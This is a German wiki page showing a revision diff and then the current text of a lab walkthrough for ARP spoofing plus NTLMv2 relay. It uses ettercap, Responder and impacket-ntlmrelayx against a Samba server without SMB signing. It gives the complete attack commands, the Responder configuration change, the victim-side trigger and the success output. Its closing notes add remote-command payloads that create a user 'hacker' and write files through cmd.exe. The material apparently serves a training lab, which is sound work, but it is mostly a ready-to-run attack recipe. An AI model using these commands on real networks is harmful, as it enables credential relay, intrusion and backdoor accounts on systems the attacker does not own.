NTLM-Relay auf Samba-Freigabe mit Impacket: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 9: | Zeile 9: | ||
! System !! IP-Adresse !! Rolle | ! System !! IP-Adresse !! Rolle | ||
|- | |- | ||
| − | | Kali Linux || 10.0.10.101 || Angreifer ( | + | | Kali Linux || 10.0.10.101 || Angreifer (ettercap, responder, ntlmrelayx) |
|- | |- | ||
| Windows 10 || 10.0.10.102 || Opfer (NTLM-fähig, ungehärtet) | | Windows 10 || 10.0.10.102 || Opfer (NTLM-fähig, ungehärtet) | ||
|- | |- | ||
| − | | Samba-Server || 10.0.10.104 || | + | | Samba-Server || 10.0.10.104 || Relay-Ziel (kein SMB Signing aktiviert) |
|} | |} | ||
== Vorbereitung auf Kali (10.0.10.101) == | == Vorbereitung auf Kali (10.0.10.101) == | ||
| − | + | * Relay-Share vorbereiten: | |
| − | |||
mkdir -p ~/relay-share | mkdir -p ~/relay-share | ||
echo "Owned by Kali" > ~/relay-share/pwned.txt | echo "Owned by Kali" > ~/relay-share/pwned.txt | ||
| + | |||
| + | * Responder konfigurieren: | ||
| + | nano /etc/responder/Responder.conf | ||
| + | |||
| + | * Abschnitt [SMB] ändern: | ||
| + | [SMB] | ||
| + | SMB = Off | ||
| + | |||
| + | * Damit Responder nicht selbst den SMB-Port (445) blockiert – sonst funktioniert ntlmrelayx nicht! | ||
== Angriffsdurchführung auf Kali (10.0.10.101) == | == Angriffsdurchführung auf Kali (10.0.10.101) == | ||
| − | === ARP-Spoofing | + | === ARP-Spoofing zwischen Opfer und Zielserver === |
| − | |||
ettercap -Tq -i eth0 -M arp /10.0.10.102// /10.0.10.104// | ettercap -Tq -i eth0 -M arp /10.0.10.102// /10.0.10.104// | ||
| − | === Responder starten === | + | === Responder starten (nur als Spoofer) === |
| − | + | responder -I eth0 -w | |
| − | responder -I eth0 - | ||
=== ntlmrelayx starten === | === ntlmrelayx starten === | ||
| − | |||
impacket-ntlmrelayx -t smb://10.0.10.104 -smb2support -i ~/relay-share --no-wcf-server --no-ldap | impacket-ntlmrelayx -t smb://10.0.10.104 -smb2support -i ~/relay-share --no-wcf-server --no-ldap | ||
== Aktion auf dem Windows-Client (10.0.10.102) == | == Aktion auf dem Windows-Client (10.0.10.102) == | ||
| − | * Windows Explorer öffnen und | + | * Windows Explorer öffnen und folgendes eingeben: |
\\irgendwas\test | \\irgendwas\test | ||
ODER: | ODER: | ||
| − | * In der Eingabeaufforderung | + | * In der Eingabeaufforderung: |
dir \\irgendeinserver\c$ | dir \\irgendeinserver\c$ | ||
| − | == Ergebnis | + | == Ergebnis == |
| − | * | + | * Die Datei „pwned.txt“ wird über ntlmrelayx auf dem Samba-Share (10.0.10.104) abgelegt. |
* In ntlmrelayx erscheint: | * In ntlmrelayx erscheint: | ||
[*] SMB relay attack successful... | [*] SMB relay attack successful... | ||
| Zeile 51: | Zeile 56: | ||
== Hinweise == | == Hinweise == | ||
| − | * Kein IP-Forwarding notwendig | + | * Kein IP-Forwarding notwendig – Ettercap leitet Layer 2 Pakete direkt weiter. |
| − | * | + | * SMB muss in Responder deaktiviert werden, sonst blockiert er Port 445. |
| − | * | + | * ntlmrelayx kann alternativ Kommandos ausführen: |
--command "net user hacker 1234 /add" | --command "net user hacker 1234 /add" | ||
| − | |||
--command "cmd.exe /c echo PWNED > C:\pwned.txt" | --command "cmd.exe /c echo PWNED > C:\pwned.txt" | ||
Version vom 18. Mai 2025, 12:21 Uhr
ARP-Spoofing & NTLMv2-Relay gegen SMB-Zielserver
Zielsetzung
Ein Windows-10-Client (10.0.10.102) wird per ARP-Spoofing in einen Man-in-the-Middle gebracht. Anschließend wird mittels LLMNR/NBNS-Spoofing durch Responder ein NTLMv2-Hash abgefangen und mit ntlmrelayx an einen Samba-Server (10.0.10.104) weitergeleitet, um dort eine Datei hochzuladen.
Umgebung
| System | IP-Adresse | Rolle |
|---|---|---|
| Kali Linux | 10.0.10.101 | Angreifer (ettercap, responder, ntlmrelayx) |
| Windows 10 | 10.0.10.102 | Opfer (NTLM-fähig, ungehärtet) |
| Samba-Server | 10.0.10.104 | Relay-Ziel (kein SMB Signing aktiviert) |
Vorbereitung auf Kali (10.0.10.101)
- Relay-Share vorbereiten:
mkdir -p ~/relay-share echo "Owned by Kali" > ~/relay-share/pwned.txt
- Responder konfigurieren:
nano /etc/responder/Responder.conf
- Abschnitt [SMB] ändern:
[SMB] SMB = Off
- Damit Responder nicht selbst den SMB-Port (445) blockiert – sonst funktioniert ntlmrelayx nicht!
Angriffsdurchführung auf Kali (10.0.10.101)
ARP-Spoofing zwischen Opfer und Zielserver
ettercap -Tq -i eth0 -M arp /10.0.10.102// /10.0.10.104//
Responder starten (nur als Spoofer)
responder -I eth0 -w
ntlmrelayx starten
impacket-ntlmrelayx -t smb://10.0.10.104 -smb2support -i ~/relay-share --no-wcf-server --no-ldap
Aktion auf dem Windows-Client (10.0.10.102)
- Windows Explorer öffnen und folgendes eingeben:
\\irgendwas\test
ODER:
- In der Eingabeaufforderung:
dir \\irgendeinserver\c$
Ergebnis
- Die Datei „pwned.txt“ wird über ntlmrelayx auf dem Samba-Share (10.0.10.104) abgelegt.
- In ntlmrelayx erscheint:
[*] SMB relay attack successful... [*] Uploaded file pwned.txt to share
Hinweise
- Kein IP-Forwarding notwendig – Ettercap leitet Layer 2 Pakete direkt weiter.
- SMB muss in Responder deaktiviert werden, sonst blockiert er Port 445.
- ntlmrelayx kann alternativ Kommandos ausführen:
--command "net user hacker 1234 /add" --command "cmd.exe /c echo PWNED > C:\pwned.txt"